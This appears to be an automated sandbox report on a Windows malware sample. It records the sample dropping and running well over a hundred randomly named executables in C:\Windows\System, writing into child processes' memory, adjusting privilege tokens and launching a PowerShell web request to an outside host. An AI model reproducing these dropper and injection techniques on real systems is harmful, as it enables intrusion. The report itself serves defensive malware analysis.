File created	C:\Windows\System\Eiwkpur.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\cUIJAaT.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\vlpzSJy.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\Lbbifok.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\XPOAwwF.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\CXiVONP.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\eWhyEBD.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2172	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
Token: SeLockMemoryPrivilege	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
Token: SeDebugPrivilege	2172	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2952 wrote to memory of 2172	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	29
PID 2952 wrote to memory of 2172	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	29
PID 2952 wrote to memory of 2172	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	29
PID 2952 wrote to memory of 2296	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	30
PID 2952 wrote to memory of 2296	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	30
PID 2952 wrote to memory of 2296	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	30
PID 2952 wrote to memory of 2284	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	31
PID 2952 wrote to memory of 2284	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	31
PID 2952 wrote to memory of 2284	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	31
PID 2952 wrote to memory of 2680	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	32
PID 2952 wrote to memory of 2680	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	32
PID 2952 wrote to memory of 2680	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	32
PID 2952 wrote to memory of 1888	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	33
PID 2952 wrote to memory of 1888	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	33
PID 2952 wrote to memory of 1888	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	33
PID 2952 wrote to memory of 2788	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	34
PID 2952 wrote to memory of 2788	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	34
PID 2952 wrote to memory of 2788	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	34
PID 2952 wrote to memory of 2760	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	35
PID 2952 wrote to memory of 2760	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	35
PID 2952 wrote to memory of 2760	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	35
PID 2952 wrote to memory of 2544	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	36
PID 2952 wrote to memory of 2544	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	36
PID 2952 wrote to memory of 2544	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	36
PID 2952 wrote to memory of 1880	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	37
PID 2952 wrote to memory of 1880	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	37
PID 2952 wrote to memory of 1880	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	37
PID 2952 wrote to memory of 2864	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	38
PID 2952 wrote to memory of 2864	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	38
PID 2952 wrote to memory of 2864	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	38
PID 2952 wrote to memory of 2888	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	39
PID 2952 wrote to memory of 2888	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	39
PID 2952 wrote to memory of 2888	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	39
PID 2952 wrote to memory of 2896	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	40
PID 2952 wrote to memory of 2896	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	40
PID 2952 wrote to memory of 2896	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	40
PID 2952 wrote to memory of 2948	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	41
PID 2952 wrote to memory of 2948	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	41
PID 2952 wrote to memory of 2948	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	41
PID 2952 wrote to memory of 3064	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	42
PID 2952 wrote to memory of 3064	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	42
PID 2952 wrote to memory of 3064	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	42
PID 2952 wrote to memory of 304	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	43
PID 2952 wrote to memory of 304	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	43
PID 2952 wrote to memory of 304	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	43
PID 2952 wrote to memory of 1980	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	44
PID 2952 wrote to memory of 1980	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	44
PID 2952 wrote to memory of 1980	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	44
PID 2952 wrote to memory of 1956	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	45
PID 2952 wrote to memory of 1956	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	45
PID 2952 wrote to memory of 1956	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	45
PID 2952 wrote to memory of 328	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	46
PID 2952 wrote to memory of 328	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	46
PID 2952 wrote to memory of 328	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	46
PID 2952 wrote to memory of 2852	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	47
PID 2952 wrote to memory of 2852	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	47
PID 2952 wrote to memory of 2852	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	47
PID 2952 wrote to memory of 1912	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	48
PID 2952 wrote to memory of 1912	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	48
PID 2952 wrote to memory of 1912	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	48
PID 2952 wrote to memory of 1636	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	49
PID 2952 wrote to memory of 1636	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	49
PID 2952 wrote to memory of 1636	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	49
PID 2952 wrote to memory of 1516	2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe	50

C:\Users\Admin\AppData\Local\Temp\aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
"C:\Users\Admin\AppData\Local\Temp\aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2172
- C:\Windows\System\FvcbqPc.exe
  C:\Windows\System\FvcbqPc.exe
  2⤵
  - Executes dropped EXE
  PID:2296
- C:\Windows\System\GvhLzdZ.exe
  C:\Windows\System\GvhLzdZ.exe
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Windows\System\HpMGuFQ.exe
  C:\Windows\System\HpMGuFQ.exe
  2⤵
  - Executes dropped EXE
  PID:2680
- C:\Windows\System\AavqXUo.exe
  C:\Windows\System\AavqXUo.exe
  2⤵
  - Executes dropped EXE
  PID:1888
- C:\Windows\System\CHivaCe.exe
  C:\Windows\System\CHivaCe.exe
  2⤵
  - Executes dropped EXE
  PID:2788
- C:\Windows\System\lAJpuXr.exe
  C:\Windows\System\lAJpuXr.exe
  2⤵
  - Executes dropped EXE
  PID:2760
- C:\Windows\System\mapaMRB.exe
  C:\Windows\System\mapaMRB.exe
  2⤵
  - Executes dropped EXE
  PID:2544
- C:\Windows\System\sxJLXoS.exe
  C:\Windows\System\sxJLXoS.exe
  2⤵
  - Executes dropped EXE
  PID:1880
- C:\Windows\System\fFcVoTz.exe
  C:\Windows\System\fFcVoTz.exe
  2⤵
  - Executes dropped EXE
  PID:2864
- C:\Windows\System\cEwrnZO.exe
  C:\Windows\System\cEwrnZO.exe
  2⤵
  - Executes dropped EXE
  PID:2888
- C:\Windows\System\lsdXJWU.exe
  C:\Windows\System\lsdXJWU.exe
  2⤵
  - Executes dropped EXE
  PID:2896
- C:\Windows\System\xqfnURL.exe
  C:\Windows\System\xqfnURL.exe
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Windows\System\ulCjThw.exe
  C:\Windows\System\ulCjThw.exe
  2⤵
  - Executes dropped EXE
  PID:3064
- C:\Windows\System\JahpZfl.exe
  C:\Windows\System\JahpZfl.exe
  2⤵
  - Executes dropped EXE
  PID:304
- C:\Windows\System\oyWzqHz.exe
  C:\Windows\System\oyWzqHz.exe
  2⤵
  - Executes dropped EXE
  PID:1980
- C:\Windows\System\ykIBCoF.exe
  C:\Windows\System\ykIBCoF.exe
  2⤵
  - Executes dropped EXE
  PID:1956
- C:\Windows\System\PfBedDQ.exe
  C:\Windows\System\PfBedDQ.exe
  2⤵
  - Executes dropped EXE
  PID:328
- C:\Windows\System\jikdNcd.exe
  C:\Windows\System\jikdNcd.exe
  2⤵
  - Executes dropped EXE
  PID:2852
- C:\Windows\System\hmoepOK.exe
  C:\Windows\System\hmoepOK.exe
  2⤵
  - Executes dropped EXE
  PID:1912
- C:\Windows\System\nKWSUte.exe
  C:\Windows\System\nKWSUte.exe
  2⤵
  - Executes dropped EXE
  PID:1636
- C:\Windows\System\TJMWAgh.exe
  C:\Windows\System\TJMWAgh.exe
  2⤵
  - Executes dropped EXE
  PID:1516
- C:\Windows\System\xsVRpgX.exe
  C:\Windows\System\xsVRpgX.exe
  2⤵
  - Executes dropped EXE
  PID:2044
- C:\Windows\System\IpBTjEa.exe
  C:\Windows\System\IpBTjEa.exe
  2⤵
  - Executes dropped EXE
  PID:2068
- C:\Windows\System\tcRcBJs.exe
  C:\Windows\System\tcRcBJs.exe
  2⤵
  - Executes dropped EXE
  PID:2040
- C:\Windows\System\UFddIiS.exe
  C:\Windows\System\UFddIiS.exe
  2⤵
  - Executes dropped EXE
  PID:2916
- C:\Windows\System\HvycKtR.exe
  C:\Windows\System\HvycKtR.exe
  2⤵
  - Executes dropped EXE
  PID:2752
- C:\Windows\System\XuvOhPK.exe
  C:\Windows\System\XuvOhPK.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\HuygIKz.exe
  C:\Windows\System\HuygIKz.exe
  2⤵
  - Executes dropped EXE
  PID:536
- C:\Windows\System\pAZokzm.exe
  C:\Windows\System\pAZokzm.exe
  2⤵
  - Executes dropped EXE
  PID:796
- C:\Windows\System\gzLDtJy.exe
  C:\Windows\System\gzLDtJy.exe
  2⤵
  - Executes dropped EXE
  PID:1056
- C:\Windows\System\nDBmlhz.exe
  C:\Windows\System\nDBmlhz.exe
  2⤵
  - Executes dropped EXE
  PID:1496
- C:\Windows\System\jffAEeg.exe
  C:\Windows\System\jffAEeg.exe
  2⤵
  - Executes dropped EXE
  PID:1484
- C:\Windows\System\kYCSSFG.exe
  C:\Windows\System\kYCSSFG.exe
  2⤵
  - Executes dropped EXE
  PID:2376
- C:\Windows\System\zcUjyHs.exe
  C:\Windows\System\zcUjyHs.exe
  2⤵
  - Executes dropped EXE
  PID:1920
- C:\Windows\System\gYcWuBW.exe
  C:\Windows\System\gYcWuBW.exe
  2⤵
  - Executes dropped EXE
  PID:1396
- C:\Windows\System\fqtVSGB.exe
  C:\Windows\System\fqtVSGB.exe
  2⤵
  - Executes dropped EXE
  PID:980
- C:\Windows\System\gYMtrXj.exe
  C:\Windows\System\gYMtrXj.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Windows\System\ieGIUhn.exe
  C:\Windows\System\ieGIUhn.exe
  2⤵
  - Executes dropped EXE
  PID:2264
- C:\Windows\System\qWsVoQf.exe
  C:\Windows\System\qWsVoQf.exe
  2⤵
  - Executes dropped EXE
  PID:844
- C:\Windows\System\EqzyVuR.exe
  C:\Windows\System\EqzyVuR.exe
  2⤵
  - Executes dropped EXE
  PID:2496
- C:\Windows\System\WBaARcT.exe
  C:\Windows\System\WBaARcT.exe
  2⤵
  - Executes dropped EXE
  PID:1672
- C:\Windows\System\iwVpbNP.exe
  C:\Windows\System\iwVpbNP.exe
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Windows\System\WGHezTr.exe
  C:\Windows\System\WGHezTr.exe
  2⤵
  - Executes dropped EXE
  PID:1988
- C:\Windows\System\OccQOxa.exe
  C:\Windows\System\OccQOxa.exe
  2⤵
  - Executes dropped EXE
  PID:948
- C:\Windows\System\XzKLudI.exe
  C:\Windows\System\XzKLudI.exe
  2⤵
  - Executes dropped EXE
  PID:2004
- C:\Windows\System\oNDcCzA.exe
  C:\Windows\System\oNDcCzA.exe
  2⤵
  - Executes dropped EXE
  PID:1824
- C:\Windows\System\vrSVykl.exe
  C:\Windows\System\vrSVykl.exe
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Windows\System\PXIQqtI.exe
  C:\Windows\System\PXIQqtI.exe
  2⤵
  - Executes dropped EXE
  PID:1656
- C:\Windows\System\nELfkrj.exe
  C:\Windows\System\nELfkrj.exe
  2⤵
  - Executes dropped EXE
  PID:1060
- C:\Windows\System\HAsuBQh.exe
  C:\Windows\System\HAsuBQh.exe
  2⤵
  - Executes dropped EXE
  PID:908
- C:\Windows\System\CHbFjOW.exe
  C:\Windows\System\CHbFjOW.exe
  2⤵
  - Executes dropped EXE
  PID:692
- C:\Windows\System\PEpQeoy.exe
  C:\Windows\System\PEpQeoy.exe
  2⤵
  - Executes dropped EXE
  PID:2428
- C:\Windows\System\hLJxLCB.exe
  C:\Windows\System\hLJxLCB.exe
  2⤵
  - Executes dropped EXE
  PID:2236
- C:\Windows\System\elfqBCI.exe
  C:\Windows\System\elfqBCI.exe
  2⤵
  - Executes dropped EXE
  PID:572
- C:\Windows\System\KCaFkts.exe
  C:\Windows\System\KCaFkts.exe
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Windows\System\YpcsCNB.exe
  C:\Windows\System\YpcsCNB.exe
  2⤵
  - Executes dropped EXE
  PID:884
- C:\Windows\System\gzswVfg.exe
  C:\Windows\System\gzswVfg.exe
  2⤵
  - Executes dropped EXE
  PID:1276
- C:\Windows\System\QepGTGH.exe
  C:\Windows\System\QepGTGH.exe
  2⤵
  - Executes dropped EXE
  PID:1744
- C:\Windows\System\bjapgSz.exe
  C:\Windows\System\bjapgSz.exe
  2⤵
  - Executes dropped EXE
  PID:2180
- C:\Windows\System\tSgNBdk.exe
  C:\Windows\System\tSgNBdk.exe
  2⤵
  - Executes dropped EXE
  PID:1336
- C:\Windows\System\lvalZtG.exe
  C:\Windows\System\lvalZtG.exe
  2⤵
  - Executes dropped EXE
  PID:2812
- C:\Windows\System\xjMEbfZ.exe
  C:\Windows\System\xjMEbfZ.exe
  2⤵
  - Executes dropped EXE
  PID:2452
- C:\Windows\System\KvOyLGC.exe
  C:\Windows\System\KvOyLGC.exe
  2⤵
  - Executes dropped EXE
  PID:1588
- C:\Windows\System\ovJHXjx.exe
  C:\Windows\System\ovJHXjx.exe
  2⤵
  - Executes dropped EXE
  PID:1596
- C:\Windows\System\pNGRALX.exe
  C:\Windows\System\pNGRALX.exe
  2⤵
  PID:2704
- C:\Windows\System\KLKKDWO.exe
  C:\Windows\System\KLKKDWO.exe
  2⤵
  PID:2652
- C:\Windows\System\nDIegXL.exe
  C:\Windows\System\nDIegXL.exe
  2⤵
  PID:2384
- C:\Windows\System\krZNOrm.exe
  C:\Windows\System\krZNOrm.exe
  2⤵
  PID:2964
- C:\Windows\System\CQgitXf.exe
  C:\Windows\System\CQgitXf.exe
  2⤵
  PID:2684
- C:\Windows\System\IzJUEGK.exe
  C:\Windows\System\IzJUEGK.exe
  2⤵
  PID:2924
- C:\Windows\System\eGkUBNH.exe
  C:\Windows\System\eGkUBNH.exe
  2⤵
  PID:2688
- C:\Windows\System\YrRWCIG.exe
  C:\Windows\System\YrRWCIG.exe
  2⤵
  PID:3044
- C:\Windows\System\gGPpRur.exe
  C:\Windows\System\gGPpRur.exe
  2⤵
  PID:2612
- C:\Windows\System\wsqkOXw.exe
  C:\Windows\System\wsqkOXw.exe
  2⤵
  PID:468
- C:\Windows\System\INPsCpN.exe
  C:\Windows\System\INPsCpN.exe
  2⤵
  PID:308
- C:\Windows\System\cWqQozf.exe
  C:\Windows\System\cWqQozf.exe
  2⤵
  PID:2648
- C:\Windows\System\iEVmcde.exe
  C:\Windows\System\iEVmcde.exe
  2⤵
  PID:2748
- C:\Windows\System\VGUderU.exe
  C:\Windows\System\VGUderU.exe
  2⤵
  PID:2584
- C:\Windows\System\QWDyWJU.exe
  C:\Windows\System\QWDyWJU.exe
  2⤵
  PID:1700
- C:\Windows\System\WrlPaDS.exe
  C:\Windows\System\WrlPaDS.exe
  2⤵
  PID:1084
- C:\Windows\System\BoKqGjc.exe
  C:\Windows\System\BoKqGjc.exe
  2⤵
  PID:2764
- C:\Windows\System\qCBAkkO.exe
  C:\Windows\System\qCBAkkO.exe
  2⤵
  PID:2840
- C:\Windows\System\miyhJBL.exe
  C:\Windows\System\miyhJBL.exe
  2⤵
  PID:1772
- C:\Windows\System\SrplMVL.exe
  C:\Windows\System\SrplMVL.exe
  2⤵
  PID:2124
- C:\Windows\System\JBNQxSF.exe
  C:\Windows\System\JBNQxSF.exe
  2⤵
  PID:2820
- C:\Windows\System\mcFFtum.exe
  C:\Windows\System\mcFFtum.exe
  2⤵
  PID:2032
- C:\Windows\System\nAzkYKF.exe
  C:\Windows\System\nAzkYKF.exe
  2⤵
  PID:1948
- C:\Windows\System\hxySqgd.exe
  C:\Windows\System\hxySqgd.exe
  2⤵
  PID:780
- C:\Windows\System\kxkQOKP.exe
  C:\Windows\System\kxkQOKP.exe
  2⤵
  PID:1252
- C:\Windows\System\OXFfyXk.exe
  C:\Windows\System\OXFfyXk.exe
  2⤵
  PID:2400
- C:\Windows\System\VcKcvSA.exe
  C:\Windows\System\VcKcvSA.exe
  2⤵
  PID:1916
- C:\Windows\System\NkGkBRx.exe
  C:\Windows\System\NkGkBRx.exe
  2⤵
  PID:2280
- C:\Windows\System\IroAJSA.exe
  C:\Windows\System\IroAJSA.exe
  2⤵
  PID:448
- C:\Windows\System\TiTSSvK.exe
  C:\Windows\System\TiTSSvK.exe
  2⤵
  PID:1160
- C:\Windows\System\uFFOjXn.exe
  C:\Windows\System\uFFOjXn.exe
  2⤵
  PID:1532
- C:\Windows\System\ZBORXSg.exe
  C:\Windows\System\ZBORXSg.exe
  2⤵
  PID:1548
- C:\Windows\System\KwJdnzP.exe
  C:\Windows\System\KwJdnzP.exe
  2⤵
  PID:1624
- C:\Windows\System\eODQTrU.exe
  C:\Windows\System\eODQTrU.exe
  2⤵
  PID:2160
- C:\Windows\System\oAmZdPz.exe
  C:\Windows\System\oAmZdPz.exe
  2⤵
  PID:2504
- C:\Windows\System\lEziovR.exe
  C:\Windows\System\lEziovR.exe
  2⤵
  PID:612
- C:\Windows\System\OBxREoY.exe
  C:\Windows\System\OBxREoY.exe
  2⤵
  PID:1380
- C:\Windows\System\LeLIFhk.exe
  C:\Windows\System\LeLIFhk.exe
  2⤵
  PID:2596
- C:\Windows\System\aVxuDgt.exe
  C:\Windows\System\aVxuDgt.exe
  2⤵
  PID:1928
- C:\Windows\System\khpjzCZ.exe
  C:\Windows\System\khpjzCZ.exe
  2⤵
  PID:2564
- C:\Windows\System\XlkcoUD.exe
  C:\Windows\System\XlkcoUD.exe
  2⤵
  PID:2772
- C:\Windows\System\skjnEIW.exe
  C:\Windows\System\skjnEIW.exe
  2⤵
  PID:352
- C:\Windows\System\SzRlbsJ.exe
  C:\Windows\System\SzRlbsJ.exe
  2⤵
  PID:2848
- C:\Windows\System\lzSVAjK.exe
  C:\Windows\System\lzSVAjK.exe
  2⤵
  PID:2600
- C:\Windows\System\XjLIUsg.exe
  C:\Windows\System\XjLIUsg.exe
  2⤵
  PID:808
- C:\Windows\System\YJxEAAP.exe
  C:\Windows\System\YJxEAAP.exe
  2⤵
  PID:2432
- C:\Windows\System\JcwBVEA.exe
  C:\Windows\System\JcwBVEA.exe
  2⤵
  PID:2424
- C:\Windows\System\QatbZhN.exe
  C:\Windows\System\QatbZhN.exe
  2⤵
  PID:1720
- C:\Windows\System\eWaofwB.exe
  C:\Windows\System\eWaofwB.exe
  2⤵
  PID:2736
- C:\Windows\System\FSvAJrd.exe
  C:\Windows\System\FSvAJrd.exe
  2⤵
  PID:2732
- C:\Windows\System\veiauUR.exe
  C:\Windows\System\veiauUR.exe
  2⤵
  PID:2944
- C:\Windows\System\dyVdBHE.exe
  C:\Windows\System\dyVdBHE.exe
  2⤵
  PID:1552
- C:\Windows\System\kKZHiZN.exe
  C:\Windows\System\kKZHiZN.exe
  2⤵
  PID:2624
- C:\Windows\System\ZqfoBfx.exe
  C:\Windows\System\ZqfoBfx.exe
  2⤵
  PID:2008
- C:\Windows\System\ikoJjiX.exe
  C:\Windows\System\ikoJjiX.exe
  2⤵
  PID:912
- C:\Windows\System\bxSpATh.exe
  C:\Windows\System\bxSpATh.exe
  2⤵
  PID:2656
- C:\Windows\System\gmxTbrI.exe
  C:\Windows\System\gmxTbrI.exe
  2⤵
  PID:3080
- C:\Windows\System\xngBJRj.exe
  C:\Windows\System\xngBJRj.exe
  2⤵
  PID:3096
- C:\Windows\System\SKBEJhK.exe
  C:\Windows\System\SKBEJhK.exe
  2⤵
  PID:3112
- C:\Windows\System\DXblDQd.exe
  C:\Windows\System\DXblDQd.exe
  2⤵
  PID:3128
- C:\Windows\System\vQHvOKn.exe
  C:\Windows\System\vQHvOKn.exe
  2⤵
  PID:3144
- C:\Windows\System\cFrXFBM.exe
  C:\Windows\System\cFrXFBM.exe
  2⤵
  PID:3160
- C:\Windows\System\OmjMMqg.exe
  C:\Windows\System\OmjMMqg.exe
  2⤵
  PID:3176
- C:\Windows\System\nNRVAhS.exe
  C:\Windows\System\nNRVAhS.exe
  2⤵
  PID:3192
- C:\Windows\System\YSeCgfK.exe
  C:\Windows\System\YSeCgfK.exe
  2⤵
  PID:3208
- C:\Windows\System\UnPyFKl.exe
  C:\Windows\System\UnPyFKl.exe
  2⤵
  PID:3224
- C:\Windows\System\HlAvvwT.exe
  C:\Windows\System\HlAvvwT.exe
  2⤵
  PID:3240
- C:\Windows\System\cWgUwFw.exe
  C:\Windows\System\cWgUwFw.exe
  2⤵
  PID:3256
- C:\Windows\System\BsVKIio.exe
  C:\Windows\System\BsVKIio.exe
  2⤵
  PID:3272
- C:\Windows\System\wwzJcgZ.exe
  C:\Windows\System\wwzJcgZ.exe
  2⤵
  PID:3288
- C:\Windows\System\SgbJexR.exe
  C:\Windows\System\SgbJexR.exe
  2⤵
  PID:3304
- C:\Windows\System\QttNNrw.exe
  C:\Windows\System\QttNNrw.exe
  2⤵
  PID:3320
- C:\Windows\System\JmgpOKv.exe
  C:\Windows\System\JmgpOKv.exe
  2⤵
  PID:3336
- C:\Windows\System\uQgqSgk.exe
  C:\Windows\System\uQgqSgk.exe
  2⤵
  PID:3352
- C:\Windows\System\BDlrtPU.exe
  C:\Windows\System\BDlrtPU.exe
  2⤵
  PID:3368
- C:\Windows\System\vDbRYpD.exe
  C:\Windows\System\vDbRYpD.exe
  2⤵
  PID:3384
- C:\Windows\System\mWkaaIp.exe
  C:\Windows\System\mWkaaIp.exe
  2⤵
  PID:3400
- C:\Windows\System\xReMRpi.exe
  C:\Windows\System\xReMRpi.exe
  2⤵
  PID:3416
- C:\Windows\System\xBRbcrQ.exe
  C:\Windows\System\xBRbcrQ.exe
  2⤵
  PID:3432
- C:\Windows\System\dOhqHgl.exe
  C:\Windows\System\dOhqHgl.exe
  2⤵
  PID:3448
- C:\Windows\System\rqCosXT.exe
  C:\Windows\System\rqCosXT.exe
  2⤵
  PID:3464
- C:\Windows\System\nmScJyp.exe
  C:\Windows\System\nmScJyp.exe
  2⤵
  PID:3480
- C:\Windows\System\qSsYovZ.exe
  C:\Windows\System\qSsYovZ.exe
  2⤵
  PID:3496
- C:\Windows\System\buNvqeW.exe
  C:\Windows\System\buNvqeW.exe
  2⤵
  PID:3512
- C:\Windows\System\mARzaCe.exe
  C:\Windows\System\mARzaCe.exe
  2⤵
  PID:3536
- C:\Windows\System\IjWFEQk.exe
  C:\Windows\System\IjWFEQk.exe
  2⤵
  PID:3552
- C:\Windows\System\vBwjQDU.exe
  C:\Windows\System\vBwjQDU.exe
  2⤵
  PID:3576
- C:\Windows\System\zHpScpr.exe
  C:\Windows\System\zHpScpr.exe
  2⤵
  PID:3592
- C:\Windows\System\JCBaOzY.exe
  C:\Windows\System\JCBaOzY.exe
  2⤵
  PID:3608
- C:\Windows\System\ZwMiBXZ.exe
  C:\Windows\System\ZwMiBXZ.exe
  2⤵
  PID:3624
- C:\Windows\System\qvVYhDo.exe
  C:\Windows\System\qvVYhDo.exe
  2⤵
  PID:3640
- C:\Windows\System\nQbIQIF.exe
  C:\Windows\System\nQbIQIF.exe
  2⤵
  PID:3656
- C:\Windows\System\Slqwqng.exe
  C:\Windows\System\Slqwqng.exe
  2⤵
  PID:3672
- C:\Windows\System\yDlMZBt.exe
  C:\Windows\System\yDlMZBt.exe
  2⤵
  PID:3688
- C:\Windows\System\sdTOLFU.exe
  C:\Windows\System\sdTOLFU.exe
  2⤵
  PID:3704
- C:\Windows\System\Bflfutm.exe
  C:\Windows\System\Bflfutm.exe
  2⤵
  PID:3720
- C:\Windows\System\MpGrTNY.exe
  C:\Windows\System\MpGrTNY.exe
  2⤵
  PID:3736
- C:\Windows\System\oUarMWp.exe
  C:\Windows\System\oUarMWp.exe
  2⤵
